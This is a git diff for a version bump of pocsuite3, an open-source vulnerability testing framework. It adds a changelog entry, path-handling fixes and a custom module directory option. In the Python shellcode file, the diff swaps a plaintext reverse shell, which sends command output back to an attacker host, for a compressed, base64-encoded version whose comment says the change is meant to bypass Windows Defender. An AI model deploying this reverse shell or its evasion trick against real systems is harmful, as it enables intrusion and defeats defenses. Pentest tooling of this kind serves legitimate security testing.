diff --git a/CHANGELOG.md b/CHANGELOG.md index ec0be004..76b416ab 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -231,4 +231,11 @@ Cross-platform shell code generation # version 1.7.7 ----------------- * 添加--dork自动用poc中的dork字段扫描功能 -* 适配Debian源格式需求 \ No newline at end of file +* 适配Debian源格式需求 + +# version 1.7.8 +----------------- +* add option to display extra parameters of poc +* add more poc attribute to result dict +* allow custom module path in console mode +* fix some compatibility problems diff --git a/docs/CODING.md b/docs/CODING.md index 88d2d3eb..8b398995 100644 --- a/docs/CODING.md +++ b/docs/CODING.md @@ -646,7 +646,7 @@ from pocsuite3.api import get_results def run_pocsuite(): # config 配置可参见命令行参数, 用于初始化 pocsuite3.lib.core.data.conf config = { - 'url': ['http://127.0.0.1:8080', 'http://127.0.0.1:21'] + 'url': ['http://127.0.0.1:8080', 'http://127.0.0.1:21'], 'poc': ['ecshop_rce', 'ftp_burst'] } diff --git a/manpages/poc-console.1 b/manpages/poc-console.1 index af9e9a90..e4df22c9 100644 --- a/manpages/poc-console.1 +++ b/manpages/poc-console.1 @@ -31,7 +31,7 @@ is maintained at: .I https://github.com/knownsec/pocsuite3/blob/master/docs/USAGE.md .PP .SH VERSION -This manual page documents pocsuite version 1.7.7 +This manual page documents pocsuite version 1.7.8 .SH AUTHOR .br (c) 2014-2021 by Knownsec 404 Team diff --git a/manpages/pocsuite.1 b/manpages/pocsuite.1 index 3292a482..9f7b89d7 100644 --- a/manpages/pocsuite.1 +++ b/manpages/pocsuite.1 @@ -250,7 +250,7 @@ is maintained at: .I https://github.com/knownsec/pocsuite3/blob/master/docs/USAGE.md .PP .SH VERSION -This manual page documents pocsuite version 1.7.7 +This manual page documents pocsuite version 1.7.8 .SH AUTHOR .br (c) 2014-2021 by Knownsec 404 Team diff --git a/pocsuite3/__init__.py b/pocsuite3/__init__.py index 445f5d39..ca3401f0 100644 --- a/pocsuite3/__init__.py +++ b/pocsuite3/__init__.py @@ -1,5 +1,5 @@ __title__ = 'pocsuite' -__version__ = '1.7.7' +__version__ = '1.7.8' __author__ = 'Knownsec Security Team' __author_email__ = 's1@seebug.org' __license__ = 'GPL 2.0' diff --git a/pocsuite3/lib/core/common.py b/pocsuite3/lib/core/common.py index efc4ef59..78d4a03a 100644 --- a/pocsuite3/lib/core/common.py +++ b/pocsuite3/lib/core/common.py @@ -797,7 +797,7 @@ def ltrim(text, char): return text -def index_modules() -> list: +def index_modules(modules_directory): """ Returns list of all exploits modules :param str modules_directory: path to modules directory @@ -805,8 +805,7 @@ def index_modules() -> list: """ modules = [] - for root, dirs, files in os.walk(paths.POCSUITE_POCS_PATH): - _, package, root = root.rpartition("pocsuite3/pocs/".replace("/", os.sep)) + for root, _, files in os.walk(modules_directory): files = filter(lambda x: not x.startswith("__") and x.endswith(".py"), files) modules.extend(map(lambda x: os.sep.join((root, os.path.splitext(x)[0])), files)) @@ -822,7 +821,7 @@ def humanize_path(path: str) -> str: :return str: humanized path """ - return path.replace(".", "/") + return path.replace(".", os.sep) def pythonize_path(path: str) -> str: @@ -834,7 +833,7 @@ def pythonize_path(path: str) -> str: :return str: pythonized path """ - return path.replace("/", ".") + return path.replace(os.sep, ".") def module_required(fn): diff --git a/pocsuite3/lib/core/interpreter.py b/pocsuite3/lib/core/interpreter.py index 8680a09c..ca0e8981 100644 --- a/pocsuite3/lib/core/interpreter.py +++ b/pocsuite3/lib/core/interpreter.py @@ -171,7 +171,7 @@ class PocsuiteInterpreter(BaseInterpreter): attack Attack target and return target vulnerable infomation exploit Get a shell from remote target""" - def __init__(self): + def __init__(self, module_directory=paths.POCSUITE_POCS_PATH): super(PocsuiteInterpreter, self).__init__() self.current_module = None @@ -186,7 +186,9 @@ def __init__(self): self.module_commands.extend(self.global_commands) self.module_commands.sort() - self.modules = index_modules() + self.modules = index_modules(module_directory) + self.module_parent_directory = os.sep.join( + module_directory.rstrip(os.sep).split(os.sep)[0:-1]) + os.sep self.modules_count = len(self.modules) # init conf.console_mode = True @@ -198,10 +200,8 @@ def __init__(self): self.main_modules_dirs = [] for module in self.modules: temp_module = module - if IS_WIN: - temp_module = temp_module.replace("/", "\\") - temp_module = temp_module.replace(paths.POCSUITE_ROOT_PATH, "").lstrip("\\") - temp_module = temp_module.replace(paths.POCSUITE_ROOT_PATH, "").lstrip("/") + temp_module = temp_module.replace( + self.module_parent_directory, '').lstrip(os.sep) self.main_modules_dirs.append(temp_module) self.__parse_prompt() @@ -315,7 +315,7 @@ def command_use(self, module_path, *args, **kwargs): if not module_path.endswith(".py"): module_path = module_path + ".py" if not os.path.exists(module_path): - module_path = os.path.join(paths.POCSUITE_ROOT_PATH, module_path) + module_path = os.path.join(self.module_parent_directory, module_path) if not os.path.exists(module_path): errMsg = "No such file: '{0}'".format(module_path) logger.error(errMsg) @@ -323,8 +323,8 @@ def command_use(self, module_path, *args, **kwargs): try: load_file_to_module(module_path) self.current_module = kb.current_poc - self.current_module.pocsuite3_module_path = ltrim(rtrim(module_path, ".py"), - os.path.join(paths.POCSUITE_ROOT_PATH, "")) + self.current_module.pocsuite3_module_path = ltrim( + rtrim(module_path, ".py"), self.module_parent_directory) except Exception as err: logger.error(str(err)) @@ -447,7 +447,7 @@ def command_list(self, *args, **kwargs): tb = prettytable.PrettyTable(["Index", "Path", "Name"]) index = 0 for tmp_module in self.main_modules_dirs: - found = os.path.join(paths.POCSUITE_ROOT_PATH, tmp_module + ".py") + found = os.path.join(self.module_parent_directory, tmp_module + ".py") with open(found, encoding='utf-8') as f: code = f.read() name = get_poc_name(code) diff --git a/pocsuite3/shellcodes/python.py b/pocsuite3/shellcodes/python.py index 41133a96..4df5b71a 100644 --- a/pocsuite3/shellcodes/python.py +++ b/pocsuite3/shellcodes/python.py @@ -1,3 +1,5 @@ +import zlib +import base64 from .base import ShellCode @@ -7,7 +9,8 @@ class PythonShellCode(ShellCode): """ def __init__(self, connect_back_ip='localhost', connect_back_port=5555): - ShellCode.__init__(self, connect_back_ip=connect_back_ip, connect_back_port=connect_back_port) + ShellCode.__init__(self, connect_back_ip=connect_back_ip, + connect_back_port=connect_back_port) def get_python_code(self, bad_chars): """ @@ -18,34 +21,23 @@ def get_python_code(self, bad_chars): print("Settings for connect back listener must be defined") return False - python_code = """ - #!/usr/bin/python - import socket,subprocess - HOST = '{{LOCALHOST}}' # The remote host - PORT = {{LOCALPORT}} # The same port as used by the server - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - # connect to attacker machine - s.connect((HOST, PORT)) - # send we are connected - s.send('[*] Connection Established!') - # start loop - while 1: - # recieve shell command - data = s.recv(1024) - print data - # if its quit, then break out and close socket - if data == 'quit' or data == 'q': - break - # do shell command - proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - # read output - stdout_value = proc.stdout.read() + proc.stderr.read() - # send output to attacker - s.send(stdout_value) - # close socket - s.close() - """ - + # compress and base64 encode to bypass windows defender + python_code = ( + b'eJxtUsFu2zAMvfsrWORgezOctdhpQA5BkGHFuiZofBuGQLY4' + b'WKgteZKcoijy7yUlNzOK6mLz8fHpkeLiajk6u6yVXg7PvjU6' + b'Uf1grAdnmkf0hRvrwZoGnUt+7A4VrCB9ebnbbdZ3HJ7PKdBZ' + b'QNUiWOyNR2iN88l+98DcicrR+Qzwn+tEjxDuEQ5GhxLqZ/Cc' + b'QHtCmzgqjg7K+MmmaP39eHu/rYq37GG3+Xk8VA/b9a88WUBj' + b'tMbGgzcgvBdEsdCLplUaE1dO2Sxj7wWwrZyrHGoJTwjC4psC' + b'SuIznqW/P/2BTUSV0bB1XtSdci3KqzRUe0F9dMYMyVOrOoTr' + b'b0ns1GKj8ERNtdh1pNz3QsuQk8ILbrEkyim7/nLzNQ/4YJX2' + b'ITtJqL+gvIN/o/IFD0hDbVE8ghlpdOS66YzDaRihhAqiOL0U' + b'V6Vg7AxJozc+QWi6RpoPTPLDs8nLCpR7M6DOWK2I/FVlR6R/' + b'L8nQas683W8DjtZ+iCv9Hs4vUxOS+xvG2FEUP55ENyLZ4ZIy' + b'YiVTsxw+X0C6bQInsfC0UWy+FFE4PvBcP+zQfKS0NByS3itr' + b'QQTj' + ) + python_code = zlib.decompress(base64.b64decode(python_code)).decode() python_code = self.format_shellcode(python_code) return python_code diff --git a/setup.py b/setup.py index 421f40a6..415e68f1 100644 --- a/setup.py +++ b/setup.py @@ -7,14 +7,14 @@ def find_packages(where='.'): # os.walk -> list[(dirname, list[subdirs], list[files])] - return [folder.replace("/", ".").lstrip(".") - for (folder, _, fils) in os.walk(where) - if "__init__.py" in fils] + return [folder.replace(os.sep, ".").strip(".") + for (folder, _, files) in os.walk(where) + if "__init__.py" in files] setup( name='pocsuite3', - version='1.7.7', + version='1.7.8', url='http://pocsuite.org', description='Pocsuite is an open-sourced remote vulnerability testing framework developed by the Knownsec Security Team.', long_description="""\